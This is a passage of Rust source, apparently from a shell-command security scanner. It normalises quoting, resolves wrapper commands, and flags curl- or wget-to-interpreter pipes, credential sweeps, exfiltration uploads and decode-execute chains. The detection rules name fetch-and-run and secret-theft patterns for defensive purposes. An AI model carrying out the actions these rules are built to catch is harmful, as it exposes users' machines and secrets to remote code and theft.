tirith_core/rules/
command.rs

1use once_cell::sync::Lazy;
2use regex::Regex;
3
4use crate::extract::ScanContext;
5use crate::redact;
6use crate::tokenize::{self, ShellType};
7use crate::verdict::{Evidence, Finding, RuleId, Severity};
8
/// Canonical, lowercase names of every program treated as an interpreter.
///
/// `is_interpreter()` does an exact lookup in this table; per the original
/// note, a drift test also validates it against the tier-1 regex.
#[rustfmt::skip]
pub const INTERPRETERS: &[&str] = &[
    // POSIX-style shells
    "sh", "bash", "zsh", "dash", "ksh", "fish", "csh", "tcsh", "ash", "mksh",
    // Python
    "python", "python2", "python3",
    // JavaScript runtimes
    "node", "deno", "bun",
    // Other scripting languages
    "perl", "ruby", "php", "lua", "tclsh", "elixir", "rscript",
    // PowerShell and cmd
    "pwsh", "iex", "invoke-expression", "cmd",
];
40
/// Parse up to `max_digits` characters from `chars[*i..]` that satisfy
/// `predicate`, interpret them as a base-`radix` number, and return the
/// corresponding `char`.
///
/// `*i` is advanced past every consumed character, even when the digits do not
/// form a valid Unicode scalar value. Returns `None` when no character was
/// consumed, when a consumed character is not a digit in `radix`, when the
/// value overflows `u32`, or when it is not a valid scalar value (for example a
/// surrogate).
///
/// The value is accumulated directly, so there is no heap allocation and no
/// fixed-size scratch buffer limiting `max_digits`.
fn parse_numeric_escape(
    chars: &[char],
    i: &mut usize,
    max_digits: usize,
    radix: u32,
    predicate: fn(&char) -> bool,
) -> Option<char> {
    // `None` once any consumed character turned out not to be a valid digit or
    // the running value overflowed; consumption continues regardless so the
    // caller's cursor ends up after the whole escape.
    let mut value: Option<u32> = Some(0);
    let mut consumed = 0usize;

    while consumed < max_digits {
        let Some(ch) = chars.get(*i).filter(|c| predicate(*c)) else {
            break;
        };
        value = value.and_then(|acc| {
            let digit = ch.to_digit(radix)?;
            acc.checked_mul(radix)?.checked_add(digit)
        });
        *i += 1;
        consumed += 1;
    }

    if consumed == 0 {
        return None;
    }
    char::from_u32(value?)
}
69
70/// Strip all shell quoting/escaping from a token, producing the effective string
71/// the shell would see after expansion.
72///
73/// Handles: single quotes, double quotes, ANSI-C quoting (`$'...'`), backslash
74/// escaping (POSIX) and backtick escaping (PowerShell).
75fn normalize_shell_token(input: &str, shell: ShellType) -> String {
76    #[derive(PartialEq)]
77    enum QState {
78        Normal,
79        Single,
80        Double,
81        AnsiC,
82    }
83
84    let chars: Vec<char> = input.chars().collect();
85    let len = chars.len();
86    let mut out = String::with_capacity(len);
87    let mut i = 0;
88    let is_ps = matches!(shell, ShellType::PowerShell);
89    let is_cmd = matches!(shell, ShellType::Cmd);
90    let mut state = QState::Normal;
91
92    while i < len {
93        match state {
94            QState::Normal => {
95                let ch = chars[i];
96                if is_cmd && ch == '^' && i + 1 < len {
97                    // Cmd caret escape: skip caret, take next char literal
98                    out.push(chars[i + 1]);
99                    i += 2;
100                } else if !is_ps && !is_cmd && ch == '\\' && i + 1 < len {
101                    // POSIX backslash escape: skip backslash, take next char literal
102                    out.push(chars[i + 1]);
103                    i += 2;
104                } else if is_ps && ch == '`' && i + 1 < len {
105                    // PowerShell backtick escape
106                    out.push(chars[i + 1]);
107                    i += 2;
108                } else if ch == '\'' && !is_cmd {
109                    state = QState::Single;
110                    i += 1;
111                } else if ch == '"' {
112                    state = QState::Double;
113                    i += 1;
114                } else if shell == ShellType::Posix
115                    && ch == '$'
116                    && i + 1 < len
117                    && chars[i + 1] == '\''
118                {
119                    state = QState::AnsiC;
120                    i += 2;
121                } else {
122                    out.push(ch);
123                    i += 1;
124                }
125            }
126            // SINGLE_QUOTE: everything literal until closing '
127            QState::Single => {
128                if chars[i] == '\'' {
129                    // PowerShell: '' inside single quotes is an escaped literal '
130                    if is_ps && i + 1 < len && chars[i + 1] == '\'' {
131                        out.push('\'');
132                        i += 2;
133                    } else {
134                        state = QState::Normal;
135                        i += 1;
136                    }
137                } else {
138                    out.push(chars[i]);
139                    i += 1;
140                }
141            }
142            // DOUBLE_QUOTE
143            QState::Double => {
144                if chars[i] == '"' {
145                    state = QState::Normal;
146                    i += 1;
147                } else if is_cmd && chars[i] == '^' && i + 1 < len {
148                    // Cmd caret escaping is still active inside double quotes.
149                    out.push(chars[i + 1]);
150                    i += 2;
151                } else if !is_ps && chars[i] == '\\' && i + 1 < len {
152                    // POSIX: only \", \\, \$, \` are special inside double quotes
153                    let next = chars[i + 1];
154                    if next == '"' || next == '\\' || next == '$' || next == '`' {
155                        out.push(next);
156                        i += 2;
157                    } else {
158                        // literal backslash
159                        out.push('\\');
160                        out.push(next);
161                        i += 2;
162                    }
163                } else if is_ps && chars[i] == '`' && i + 1 < len {
164                    // PowerShell backtick escape inside double quotes
165                    out.push(chars[i + 1]);
166                    i += 2;
167                } else {
168                    out.push(chars[i]);
169                    i += 1;
170                }
171            }
172            // ANSIC_QUOTE (POSIX only): decode escape sequences
173            QState::AnsiC => {
174                if chars[i] == '\'' {
175                    state = QState::Normal;
176                    i += 1;
177                } else if chars[i] == '\\' && i + 1 < len {
178                    let esc = chars[i + 1];
179                    match esc {
180                        'n' => {
181                            out.push('\n');
182                            i += 2;
183                        }
184                        't' => {
185                            out.push('\t');
186                            i += 2;
187                        }
188                        'r' => {
189                            out.push('\r');
190                            i += 2;
191                        }
192                        '\\' => {
193                            out.push('\\');
194                            i += 2;
195                        }
196                        '\'' => {
197                            out.push('\'');
198                            i += 2;
199                        }
200                        '"' => {
201                            out.push('"');
202                            i += 2;
203                        }
204                        'a' => {
205                            out.push('\x07');
206                            i += 2;
207                        }
208                        'b' => {
209                            out.push('\x08');
210                            i += 2;
211                        }
212                        'e' | 'E' => {
213                            out.push('\x1b');
214                            i += 2;
215                        }
216                        'f' => {
217                            out.push('\x0c');
218                            i += 2;
219                        }
220                        'v' => {
221                            out.push('\x0b');
222                            i += 2;
223                        }
224                        'x' => {
225                            // \xHH — 1 or 2 hex digits
226                            i += 2;
227                            if let Some(c) =
228                                parse_numeric_escape(&chars, &mut i, 2, 16, char::is_ascii_hexdigit)
229                            {
230                                out.push(c);
231                            }
232                        }
233                        'u' => {
234                            // \uHHHH — 1 to 4 hex digits
235                            i += 2;
236                            if let Some(c) =
237                                parse_numeric_escape(&chars, &mut i, 4, 16, char::is_ascii_hexdigit)
238                            {
239                                out.push(c);
240                            }
241                        }
242                        'U' => {
243                            // \UHHHHHHHH — 1 to 8 hex digits
244                            i += 2;
245                            if let Some(c) =
246                                parse_numeric_escape(&chars, &mut i, 8, 16, char::is_ascii_hexdigit)
247                            {
248                                out.push(c);
249                            }
250                        }
251                        c if c.is_ascii_digit() && c <= '7' => {
252                            // \NNN octal — 1 to 3 octal digits
253                            i += 1; // skip backslash
254                            if let Some(c) = parse_numeric_escape(&chars, &mut i, 3, 8, |c| {
255                                c.is_ascii_digit() && *c <= '7'
256                            }) {
257                                out.push(c);
258                            }
259                        }
260                        _ => {
261                            // Unknown escape: emit literal
262                            out.push('\\');
263                            out.push(esc);
264                            i += 2;
265                        }
266                    }
267                } else {
268                    out.push(chars[i]);
269                    i += 1;
270                }
271            }
272        }
273    }
274    out
275}
276
277/// Extract the effective command base name from a raw token.
278///
279/// Normalize → path basename → first word → lowercase → strip .exe
280fn normalize_cmd_base(raw: &str, shell: ShellType) -> String {
281    let normalized = normalize_shell_token(raw.trim(), shell);
282    basename_from_normalized(&normalized, shell)
283}
284
285/// Extract basename from an already-normalized (unquoted) string.
286/// Handles path separators, first-word extraction, lowercasing, and .exe stripping.
287fn basename_from_normalized(normalized: &str, shell: ShellType) -> String {
288    let has_path_sep = match shell {
289        ShellType::PowerShell | ShellType::Cmd => {
290            normalized.contains('/') || normalized.contains('\\')
291        }
292        _ => normalized.contains('/'),
293    };
294    let after_path = if has_path_sep {
295        match shell {
296            ShellType::PowerShell | ShellType::Cmd => {
297                normalized.rsplit(['/', '\\']).next().unwrap_or(normalized)
298            }
299            _ => normalized.rsplit('/').next().unwrap_or(normalized),
300        }
301    } else {
302        normalized
303    };
304    let first_word = after_path.split_whitespace().next().unwrap_or("");
305    let lower = first_word.to_lowercase();
306    if lower.ends_with(".exe") {
307        lower[..lower.len() - 4].to_string()
308    } else {
309        lower
310    }
311}
312
313fn is_interpreter(cmd: &str) -> bool {
314    INTERPRETERS.contains(&cmd)
315}
316
317/// Run command-shape rules.
318pub fn check(
319    input: &str,
320    shell: ShellType,
321    cwd: Option<&str>,
322    scan_context: ScanContext,
323) -> Vec<Finding> {
324    let mut findings = Vec::new();
325    let segments = tokenize::tokenize(input, shell);
326
327    // Check for pipe-to-interpreter patterns
328    let has_pipe = segments.iter().any(|s| {
329        s.preceding_separator.as_deref() == Some("|")
330            || s.preceding_separator.as_deref() == Some("|&")
331    });
332    if has_pipe {
333        check_pipe_to_interpreter(&segments, shell, &mut findings);
334    }
335
336    // Check for insecure TLS flags in source commands
337    for segment in &segments {
338        if let Some(ref cmd) = segment.command {
339            let cmd_base = normalize_cmd_base(cmd, shell);
340            if is_source_command(&cmd_base) {
341                let tls_findings =
342                    crate::rules::transport::check_insecure_flags(&segment.args, true);
343                findings.extend(tls_findings);
344            }
345        }
346    }
347
348    // Check for dotfile overwrites
349    check_dotfile_overwrite(&segments, &mut findings);
350
351    // Check for archive extraction to sensitive paths
352    check_archive_extract(&segments, &mut findings);
353
354    // Check for process memory access
355    check_proc_mem_access(&segments, shell, &mut findings);
356
357    // Check for Docker remote privilege escalation
358    check_docker_remote_privesc(&segments, shell, &mut findings);
359
360    // Check for credential file sweep (exec-only)
361    check_credential_file_sweep(&segments, shell, scan_context, &mut findings);
362
363    // Check for cargo install/add without supply-chain audit (exec-only)
364    if scan_context == ScanContext::Exec {
365        check_vet_not_configured(&segments, cwd, &mut findings);
366    }
367
368    // Check for dangerous environment variable exports
369    check_env_var_in_command(&segments, &mut findings);
370
371    // Check for network destination access (metadata endpoints, private networks)
372    check_network_destination(&segments, &mut findings);
373
374    // Check for base64 decode-execute chains
375    check_base64_decode_execute(&segments, shell, &mut findings);
376
377    // Check for data exfiltration via curl/wget uploads
378    check_data_exfiltration(&segments, shell, &mut findings);
379
380    findings
381}
382
383/// Resolve the effective interpreter from a segment, handling all quoting forms,
384/// wrappers (sudo, env, command, exec, nohup), subshells, and brace groups.
385fn resolve_interpreter_name(seg: &tokenize::Segment, shell: ShellType) -> Option<String> {
386    if let Some(ref cmd) = seg.command {
387        let cmd_base = normalize_cmd_base(cmd, shell);
388
389        // Direct interpreter
390        if is_interpreter(&cmd_base) {
391            return Some(cmd_base);
392        }
393
394        // Subshell: (bash) → strip parens, check
395        let stripped = cmd_base.trim_start_matches('(').trim_end_matches(')');
396        if stripped != cmd_base && is_interpreter(stripped) {
397            return Some(stripped.to_string());
398        }
399
400        // Brace group: { → first arg is command
401        if cmd_base == "{" {
402            return resolve_from_args(&seg.args, shell);
403        }
404
405        // Known wrappers
406        match cmd_base.as_str() {
407            "sudo" => return resolve_sudo_args(&seg.args, shell),
408            "env" => return resolve_env_args(&seg.args, shell),
409            "command" | "exec" | "nohup" => {
410                return resolve_wrapper_args(&seg.args, &cmd_base, shell);
411            }
412            _ => {}
413        }
414    }
415    None
416}
417
418/// Resolve the base command from a segment, stripping sudo/env/command/nohup/exec wrappers.
419/// Returns the normalized base command name (lowercase, .exe stripped).
420/// Unlike `resolve_interpreter_name`, this returns ANY command — not just interpreters.
421fn resolve_base_through_wrappers(seg: &tokenize::Segment, shell: ShellType) -> String {
422    let Some(ref cmd) = seg.command else {
423        return String::new();
424    };
425    let cmd_base = normalize_cmd_base(cmd, shell);
426
427    match cmd_base.as_str() {
428        "sudo" => resolve_base_sudo(&seg.args, shell).unwrap_or(cmd_base),
429        "env" => resolve_base_env(&seg.args, shell).unwrap_or(cmd_base),
430        "command" | "exec" | "nohup" => {
431            resolve_base_wrapper(&seg.args, &cmd_base, shell).unwrap_or(cmd_base)
432        }
433        _ => cmd_base,
434    }
435}
436
437/// Resolve base command through sudo wrapper.
438fn resolve_base_sudo(args: &[String], shell: ShellType) -> Option<String> {
439    let value_short_flags = ["-u", "-g", "-C", "-D", "-R", "-T"];
440    let value_long_flags = [
441        "--user",
442        "--group",
443        "--close-from",
444        "--chdir",
445        "--role",
446        "--type",
447        "--other-user",
448        "--host",
449        "--timeout",
450    ];
451    let mut idx = 0;
452    while idx < args.len() {
453        let normalized = normalize_shell_token(args[idx].trim(), shell);
454        if normalized == "--" {
455            // Next positional after -- is the command
456            if idx + 1 < args.len() {
457                return Some(normalize_cmd_base(&args[idx + 1], shell));
458            }
459            return None;
460        }
461        if normalized.starts_with("--") {
462            if value_long_flags.iter().any(|f| normalized == *f) {
463                idx += 2;
464            } else {
465                idx += 1;
466            }
467            continue;
468        }
469        if normalized.starts_with('-') {
470            if value_short_flags.iter().any(|f| normalized == *f)
471                || (normalized.len() > 2
472                    && value_short_flags
473                        .iter()
474                        .any(|f| normalized.ends_with(&f[1..])))
475            {
476                idx += 2;
477            } else {
478                idx += 1;
479            }
480            continue;
481        }
482        // First positional is the command — recurse for nested wrappers
483        let base = normalize_cmd_base(&args[idx], shell);
484        return match base.as_str() {
485            "sudo" => resolve_base_sudo(&args[idx + 1..], shell),
486            "env" => resolve_base_env(&args[idx + 1..], shell),
487            "command" | "exec" | "nohup" => resolve_base_wrapper(&args[idx + 1..], &base, shell),
488            _ => Some(base),
489        };
490    }
491    None
492}
493
494/// Resolve base command through env wrapper.
495fn resolve_base_env(args: &[String], shell: ShellType) -> Option<String> {
496    let value_short_flags = ["-u", "-C"];
497    let value_long_flags = [
498        "--unset",
499        "--chdir",
500        "--split-string",
501        "--block-signal",
502        "--default-signal",
503        "--ignore-signal",
504    ];
505    let mut idx = 0;
506    while idx < args.len() {
507        let normalized = normalize_shell_token(args[idx].trim(), shell);
508        if normalized == "--" {
509            if idx + 1 < args.len() {
510                return Some(normalize_cmd_base(&args[idx + 1], shell));
511            }
512            return None;
513        }
514        if normalized.starts_with("--") {
515            if normalized == "--split-string" {
516                if idx + 1 < args.len() {
517                    return resolve_base_from_command_string(&args[idx + 1], shell);
518                }
519                return None;
520            }
521            if let Some(val) = normalized.strip_prefix("--split-string=") {
522                return resolve_base_from_command_string(val, shell);
523            }
524            if value_long_flags.iter().any(|f| normalized == *f) {
525                idx += 2;
526            } else {
527                idx += 1;
528            }
529            continue;
530        }
531        if normalized == "-S" {
532            if idx + 1 < args.len() {
533                return resolve_base_from_command_string(&args[idx + 1], shell);
534            }
535            return None;
536        }
537        if normalized.starts_with('-') {
538            if value_short_flags.iter().any(|f| normalized == *f) {
539                idx += 2;
540            } else {
541                idx += 1;
542            }
543            continue;
544        }
545        // VAR=VALUE assignments
546        if normalized.contains('=') {
547            idx += 1;
548            continue;
549        }
550        // First positional is the command
551        let base = normalize_cmd_base(&args[idx], shell);
552        return match base.as_str() {
553            "sudo" => resolve_base_sudo(&args[idx + 1..], shell),
554            "env" => resolve_base_env(&args[idx + 1..], shell),
555            "command" | "exec" | "nohup" => resolve_base_wrapper(&args[idx + 1..], &base, shell),
556            _ => Some(base),
557        };
558    }
559    None
560}
561
562fn resolve_base_from_command_string(command: &str, shell: ShellType) -> Option<String> {
563    let normalized = normalize_shell_token(command.trim(), shell);
564    if normalized.is_empty() {
565        return None;
566    }
567
568    let segments = tokenize::tokenize(&normalized, shell);
569    let first = segments.first()?;
570    let base = resolve_base_through_wrappers(first, shell);
571    if base.is_empty() {
572        None
573    } else {
574        Some(base)
575    }
576}
577
578fn unwrap_env_split_string_segment(
579    seg: &tokenize::Segment,
580    shell: ShellType,
581) -> Option<tokenize::Segment> {
582    let command = seg.command.as_ref()?;
583    if normalize_cmd_base(command, shell) != "env" {
584        return None;
585    }
586
587    let value_short_flags = ["-u", "-C"];
588    let value_long_flags = [
589        "--unset",
590        "--chdir",
591        "--block-signal",
592        "--default-signal",
593        "--ignore-signal",
594    ];
595
596    let args = &seg.args;
597    let mut idx = 0;
598    while idx < args.len() {
599        let normalized = normalize_shell_token(args[idx].trim(), shell);
600        if normalized == "--split-string" || normalized == "-S" {
601            let command = args.get(idx + 1)?;
602            let normalized_command = normalize_shell_token(command.trim(), shell);
603            return tokenize::tokenize(&normalized_command, shell)
604                .into_iter()
605                .next();
606        }
607        if let Some(val) = normalized.strip_prefix("--split-string=") {
608            let normalized_command = normalize_shell_token(val.trim(), shell);
609            return tokenize::tokenize(&normalized_command, shell)
610                .into_iter()
611                .next();
612        }
613        if normalized == "--" {
614            return None;
615        }
616        if normalized.starts_with("--") {
617            if value_long_flags.iter().any(|f| normalized == *f) {
618                idx += 2;
619            } else {
620                idx += 1;
621            }
622            continue;
623        }
624        if normalized.starts_with('-') {
625            if value_short_flags.iter().any(|f| normalized == *f) {
626                idx += 2;
627            } else {
628                idx += 1;
629            }
630            continue;
631        }
632        if normalized.contains('=') {
633            idx += 1;
634            continue;
635        }
636        return None;
637    }
638    None
639}
640
641/// Resolve base command through command/exec/nohup wrappers.
642fn resolve_base_wrapper(args: &[String], wrapper: &str, shell: ShellType) -> Option<String> {
643    let value_flags: &[&str] = match wrapper {
644        "exec" => &["-a"],
645        _ => &[],
646    };
647    let mut idx = 0;
648    while idx < args.len() {
649        let normalized = normalize_shell_token(args[idx].trim(), shell);
650        if normalized == "--" {
651            if idx + 1 < args.len() {
652                return Some(normalize_cmd_base(&args[idx + 1], shell));
653            }
654            return None;
655        }
656        if normalized.starts_with("--") || normalized.starts_with('-') {
657            if value_flags.iter().any(|f| normalized == *f) {
658                idx += 2;
659            } else {
660                idx += 1;
661            }
662            continue;
663        }
664        let base = normalize_cmd_base(&args[idx], shell);
665        return match base.as_str() {
666            "sudo" => resolve_base_sudo(&args[idx + 1..], shell),
667            "env" => resolve_base_env(&args[idx + 1..], shell),
668            "command" | "exec" | "nohup" => resolve_base_wrapper(&args[idx + 1..], &base, shell),
669            _ => Some(base),
670        };
671    }
672    None
673}
674
/// Selects which argument grammar `resolve_with_parser` applies to the
/// remaining arguments on its next step.
#[derive(Copy, Clone)]
enum ResolverParser {
    /// Plain argument list: skip flags and assignments, then inspect the command.
    Generic,
    /// Arguments following `sudo`.
    Sudo,
    /// Arguments following `env`.
    Env,
    /// Arguments following `command`.
    Command,
    /// Arguments following `exec`.
    Exec,
    /// Arguments following `nohup`.
    Nohup,
}
684
685enum ResolveStep<'a> {
686    Found(String),
687    Next {
688        parser: ResolverParser,
689        args: &'a [String],
690        inspected: usize,
691    },
692    Stop,
693}
694
695/// Resolve interpreter from a generic arg list. Uses an iterative parser with a
696/// token-inspection budget so deeply nested wrappers cannot bypass detection.
697fn resolve_from_args(args: &[String], shell: ShellType) -> Option<String> {
698    resolve_with_parser(args, shell, ResolverParser::Generic)
699}
700
701fn resolve_sudo_args(args: &[String], shell: ShellType) -> Option<String> {
702    resolve_with_parser(args, shell, ResolverParser::Sudo)
703}
704
705fn resolve_env_args(args: &[String], shell: ShellType) -> Option<String> {
706    resolve_with_parser(args, shell, ResolverParser::Env)
707}
708
709fn resolve_wrapper_args(args: &[String], wrapper: &str, shell: ShellType) -> Option<String> {
710    let parser = match wrapper {
711        "command" => ResolverParser::Command,
712        "exec" => ResolverParser::Exec,
713        "nohup" => ResolverParser::Nohup,
714        _ => ResolverParser::Command,
715    };
716    resolve_with_parser(args, shell, parser)
717}
718
719fn resolve_with_parser(
720    args: &[String],
721    shell: ShellType,
722    start_parser: ResolverParser,
723) -> Option<String> {
724    if args.is_empty() {
725        return None;
726    }
727
728    let mut parser = start_parser;
729    let mut current = args;
730    // Budget scales with input size and keeps resolution bounded even on adversarial inputs.
731    let mut budget = args.len().saturating_mul(4).saturating_add(8);
732
733    while budget > 0 && !current.is_empty() {
734        let step = match parser {
735            ResolverParser::Generic => resolve_step_generic(current, shell),
736            ResolverParser::Sudo => resolve_step_sudo(current, shell),
737            ResolverParser::Env => resolve_step_env(current, shell),
738            ResolverParser::Command => resolve_step_wrapper(current, shell, "command"),
739            ResolverParser::Exec => resolve_step_wrapper(current, shell, "exec"),
740            ResolverParser::Nohup => resolve_step_wrapper(current, shell, "nohup"),
741        };
742
743        match step {
744            ResolveStep::Found(interpreter) => return Some(interpreter),
745            ResolveStep::Stop => return None,
746            ResolveStep::Next {
747                parser: next_parser,
748                args: next_args,
749                inspected,
750            } => {
751                parser = next_parser;
752                current = next_args;
753                budget = budget.saturating_sub(inspected.max(1));
754            }
755        }
756    }
757    None
758}
759
760fn resolve_step_generic<'a>(args: &'a [String], shell: ShellType) -> ResolveStep<'a> {
761    let mut idx = 0;
762    let mut seen_dashdash = false;
763    while idx < args.len() {
764        let raw = args[idx].trim();
765        let normalized = normalize_shell_token(raw, shell);
766
767        // Track end-of-options marker
768        if normalized == "--" {
769            seen_dashdash = true;
770            idx += 1;
771            continue;
772        }
773
774        // Skip flags and assignments (only before --)
775        if !seen_dashdash
776            && (normalized.starts_with("--")
777                || normalized.starts_with('-')
778                || normalized.contains('='))
779        {
780            idx += 1;
781            continue;
782        }
783
784        let base = basename_from_normalized(&normalized, shell);
785        return match base.as_str() {
786            "sudo" => ResolveStep::Next {
787                parser: ResolverParser::Sudo,
788                args: &args[idx + 1..],
789                inspected: idx + 1,
790            },
791            "env" => ResolveStep::Next {
792                parser: ResolverParser::Env,
793                args: &args[idx + 1..],
794                inspected: idx + 1,
795            },
796            "command" => ResolveStep::Next {
797                parser: ResolverParser::Command,
798                args: &args[idx + 1..],
799                inspected: idx + 1,
800            },
801            "exec" => ResolveStep::Next {
802                parser: ResolverParser::Exec,
803                args: &args[idx + 1..],
804                inspected: idx + 1,
805            },
806            "nohup" => ResolveStep::Next {
807                parser: ResolverParser::Nohup,
808                args: &args[idx + 1..],
809                inspected: idx + 1,
810            },
811            _ if is_interpreter(&base) => ResolveStep::Found(base),
812            _ => ResolveStep::Stop,
813        };
814    }
815    ResolveStep::Stop
816}
817
818fn resolve_step_sudo<'a>(args: &'a [String], shell: ShellType) -> ResolveStep<'a> {
819    let value_short_flags = ["-u", "-g", "-C", "-D", "-R", "-T"];
820    let value_long_flags = [
821        "--user",
822        "--group",
823        "--close-from",
824        "--chdir",
825        "--role",
826        "--type",
827        "--other-user",
828        "--host",
829        "--timeout",
830    ];
831
832    let mut idx = 0;
833    while idx < args.len() {
834        let raw = args[idx].trim();
835        let normalized = normalize_shell_token(raw, shell);
836        // -- ends option parsing; remaining args are the command
837        if normalized == "--" {
838            return ResolveStep::Next {
839                parser: ResolverParser::Generic,
840                args: &args[(idx + 1).min(args.len())..],
841                inspected: idx + 1,
842            };
843        }
844        if normalized.starts_with("--") {
845            if value_long_flags.iter().any(|f| normalized == *f) {
846                idx += 2;
847                continue;
848            }
849            if let Some((key, _)) = normalized.split_once('=') {
850                if value_long_flags.contains(&key) {
851                    idx += 1;
852                    continue;
853                }
854            }
855            // Unknown long flag: treat as boolean.
856            idx += 1;
857            continue;
858        }
859        if normalized.starts_with('-') {
860            if value_short_flags.iter().any(|f| normalized == *f) {
861                // Exact match: e.g. -u → next arg is the value
862                idx += 2;
863            } else if normalized.len() > 2
864                && value_short_flags.iter().any(|f| {
865                    normalized.ends_with(&f[1..]) // last char matches value-flag letter
866                })
867            {
868                // Combined short flags: e.g. -iu → -i + -u, last flag takes a value
869                idx += 2;
870            } else {
871                idx += 1;
872            }
873            continue;
874        }
875        return ResolveStep::Next {
876            parser: ResolverParser::Generic,
877            args: &args[idx..],
878            inspected: idx + 1,
879        };
880    }
881    ResolveStep::Stop
882}
883
884fn resolve_step_env<'a>(args: &'a [String], shell: ShellType) -> ResolveStep<'a> {
885    let value_short_flags = ["-u", "-C"];
886    let value_long_flags = [
887        "--unset",
888        "--chdir",
889        "--split-string",
890        "--block-signal",
891        "--default-signal",
892        "--ignore-signal",
893    ];
894
895    let mut idx = 0;
896    while idx < args.len() {
897        let raw = args[idx].trim();
898        let normalized = normalize_shell_token(raw, shell);
899        // -- ends option parsing; remaining args are the command
900        if normalized == "--" {
901            return ResolveStep::Next {
902                parser: ResolverParser::Generic,
903                args: &args[(idx + 1).min(args.len())..],
904                inspected: idx + 1,
905            };
906        }
907        if normalized.starts_with("--") {
908            // --split-string: value is a command string.
909            if normalized == "--split-string" {
910                if idx + 1 < args.len() {
911                    let base = normalize_cmd_base(&args[idx + 1], shell);
912                    if is_interpreter(&base) {
913                        return ResolveStep::Found(base);
914                    }
915                }
916                idx += 2;
917                continue;
918            }
919            if let Some(val) = normalized.strip_prefix("--split-string=") {
920                let base = normalize_cmd_base(val, shell);
921                if is_interpreter(&base) {
922                    return ResolveStep::Found(base);
923                }
924                idx += 1;
925                continue;
926            }
927            if value_long_flags.iter().any(|f| normalized == *f) {
928                idx += 2;
929                continue;
930            }
931            if let Some((key, _)) = normalized.split_once('=') {
932                if value_long_flags.contains(&key) {
933                    idx += 1;
934                    continue;
935                }
936            }
937            // Unknown long flag: treat as boolean.
938            idx += 1;
939            continue;
940        }
941        if normalized == "-S" {
942            // -S: value is a command string.
943            if idx + 1 < args.len() {
944                let base = normalize_cmd_base(&args[idx + 1], shell);
945                if is_interpreter(&base) {
946                    return ResolveStep::Found(base);
947                }
948            }
949            idx += 2;
950            continue;
951        }
952        if normalized.starts_with('-') {
953            if value_short_flags.iter().any(|f| normalized == *f) {
954                idx += 2;
955            } else {
956                idx += 1;
957            }
958            continue;
959        }
960        if normalized.contains('=') {
961            idx += 1;
962            continue;
963        }
964        return ResolveStep::Next {
965            parser: ResolverParser::Generic,
966            args: &args[idx..],
967            inspected: idx + 1,
968        };
969    }
970    ResolveStep::Stop
971}
972
973fn resolve_step_wrapper<'a>(
974    args: &'a [String],
975    shell: ShellType,
976    wrapper: &str,
977) -> ResolveStep<'a> {
978    let value_flags: &[&str] = match wrapper {
979        "exec" => &["-a"],
980        _ => &[],
981    };
982
983    let mut idx = 0;
984    while idx < args.len() {
985        let raw = args[idx].trim();
986        let normalized = normalize_shell_token(raw, shell);
987        // -- ends option parsing; remaining args are the command
988        if normalized == "--" {
989            return ResolveStep::Next {
990                parser: ResolverParser::Generic,
991                args: &args[(idx + 1).min(args.len())..],
992                inspected: idx + 1,
993            };
994        }
995        if normalized.starts_with("--") || normalized.starts_with('-') {
996            if value_flags.iter().any(|f| normalized == *f) {
997                idx += 2;
998            } else {
999                idx += 1;
1000            }
1001            continue;
1002        }
1003        return ResolveStep::Next {
1004            parser: ResolverParser::Generic,
1005            args: &args[idx..],
1006            inspected: idx + 1,
1007        };
1008    }
1009    ResolveStep::Stop
1010}
1011
1012fn check_pipe_to_interpreter(
1013    segments: &[tokenize::Segment],
1014    shell: ShellType,
1015    findings: &mut Vec<Finding>,
1016) {
1017    for (i, seg) in segments.iter().enumerate() {
1018        if i == 0 {
1019            continue;
1020        }
1021        if let Some(sep) = &seg.preceding_separator {
1022            if sep == "|" || sep == "|&" {
1023                if let Some(interpreter) = resolve_interpreter_name(seg, shell) {
1024                    // i > 0 is guaranteed — the loop skips i == 0 above.
1025                    let source = &segments[i - 1];
1026                    let source_cmd_ref = source.command.as_deref().unwrap_or("unknown");
1027                    let source_base = normalize_cmd_base(source_cmd_ref, shell);
1028                    let source_is_tirith_run = source_base == "tirith"
1029                        && source
1030                            .args
1031                            .first()
1032                            .map(|arg| normalize_cmd_base(arg, shell) == "run")
1033                            .unwrap_or(false);
1034                    let source_label = if source_is_tirith_run {
1035                        "tirith run".to_string()
1036                    } else {
1037                        source_base.clone()
1038                    };
1039
1040                    // Skip if the source is tirith itself — its output is trusted.
1041                    if source_base == "tirith" && !source_is_tirith_run {
1042                        continue;
1043                    }
1044
1045                    let rule_id = match source_base.as_str() {
1046                        "curl" => RuleId::CurlPipeShell,
1047                        "wget" => RuleId::WgetPipeShell,
1048                        "http" | "https" => RuleId::HttpiePipeShell,
1049                        "xh" => RuleId::XhPipeShell,
1050                        _ => RuleId::PipeToInterpreter,
1051                    };
1052
1053                    let display_cmd = seg.command.as_deref().unwrap_or(&interpreter);
1054
1055                    let base_desc = format!(
1056                        "Command pipes output from '{source_label}' directly to \
1057                         interpreter '{interpreter}'. Downloaded content will be \
1058                         executed without inspection."
1059                    );
1060
1061                    let description = if is_url_fetch_command(&source_base) {
1062                        let show_tirith_run = cfg!(unix)
1063                            && supports_tirith_run_hint(&source_base)
1064                            && shell != ShellType::PowerShell;
1065                        if let Some(url) = extract_urls_from_args(&source.args, shell)
1066                            .into_iter()
1067                            .next()
1068                            .map(|u| sanitize_url_for_display(&u))
1069                        {
1070                            if show_tirith_run {
1071                                format!(
1072                                    "{base_desc}\n  Safer: tirith run {url}  \
1073                                     \u{2014} or: vet {url}  (https://getvet.sh)"
1074                                )
1075                            } else {
1076                                format!(
1077                                    "{base_desc}\n  Safer: vet {url}  \
1078                                     (https://getvet.sh)"
1079                                )
1080                            }
1081                        } else if show_tirith_run {
1082                            format!(
1083                                "{base_desc}\n  Safer: use 'tirith run <url>' \
1084                                 or 'vet <url>' (https://getvet.sh) to inspect \
1085                                 before executing."
1086                            )
1087                        } else {
1088                            format!(
1089                                "{base_desc}\n  Safer: use 'vet <url>' \
1090                                 (https://getvet.sh) to inspect before executing."
1091                            )
1092                        }
1093                    } else {
1094                        base_desc
1095                    };
1096
1097                    let mut evidence = vec![Evidence::CommandPattern {
1098                        pattern: "pipe to interpreter".to_string(),
1099                        matched: redact::redact_shell_assignments(&format!(
1100                            "{} | {}",
1101                            source.raw, seg.raw
1102                        )),
1103                    }];
1104                    for url in extract_urls_from_args(&source.args, shell) {
1105                        evidence.push(Evidence::Url { raw: url });
1106                    }
1107
1108                    findings.push(Finding {
1109                        rule_id,
1110                        severity: Severity::High,
1111                        title: format!("Pipe to interpreter: {source_cmd_ref} | {display_cmd}"),
1112                        description,
1113                        evidence,
1114                        human_view: None,
1115                        agent_view: None,
1116                        mitre_id: None,
1117                        custom_rule_id: None,
1118                    });
1119                }
1120            }
